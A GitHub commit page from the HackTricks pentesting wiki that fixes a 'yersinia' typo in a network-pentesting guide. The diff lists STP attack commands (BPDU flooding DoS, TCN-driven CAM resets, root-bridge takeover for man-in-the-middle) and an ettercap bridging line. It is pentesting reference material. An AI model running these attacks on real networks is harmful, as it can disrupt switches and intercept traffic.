Skip to content

Commit

Permalink
Merge pull request HackTricks-wiki#1 from jenaye/typo-fix-yersinia
Browse files Browse the repository at this point in the history
[Typo] - yersinia command
  • Loading branch information
jenaye authored Mar 9, 2022
2 parents 6eaa6e8 + 69f4332 commit dc9bd46
Showing 1 changed file with 7 additions and 7 deletions.
14 changes: 7 additions & 7 deletions pentesting/pentesting-network/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -370,8 +370,8 @@ This attack will send a **specially crafted packet to the IP of a client but wit
Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly.

```bash
yersina stp -attack 2
yersina stp -attack 3
yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing
```

Expand All @@ -380,8 +380,8 @@ yersina stp -attack 3
When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub

```bash
yersina stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersina stp -attack 0 #Will send 1 CONF packet, nothing else will happen
yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
```

#### **STP Root Attack**
Expand All @@ -390,14 +390,14 @@ The attacker simulates the behaviour of a switch to become the STP root of the n
This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch.

```bash
yersina stp -attack 4 #Behaves like the root switch
yersina stp -attack 5 #This will make the device behaves as a switch but will not be root
yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
```

**If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him** (a MITM attack will be performed).

```bash
yersina stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
```

Expand Down

0 comments on commit dc9bd46

Please sign in to comment.